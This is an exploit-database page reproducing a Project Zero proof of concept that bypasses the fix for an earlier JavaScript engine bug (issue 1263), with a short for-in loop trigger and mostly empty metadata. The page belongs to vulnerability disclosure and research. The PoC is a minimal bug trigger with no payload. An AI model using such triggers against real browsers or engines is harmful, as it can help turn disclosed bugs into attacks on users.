header-logo
Suggest Exploit
vendor:
N/A
by:
Project Zero
3,3
CVSS
MEDIUM
Bypassing the fix for issue 1263
20
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Bypassing the fix for issue 1263

The following PoC bypasses the fix for the issue 1263. The PoC contains a function f() which creates an object o and then iterates over an object {xx: 0} and then prints the value of o[i].

Mitigation:

N/A
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319

The following PoC bypasses the fix for the  issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)

PoC:
-->

function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();

Navigation

Suggest Exploit

Services By CQR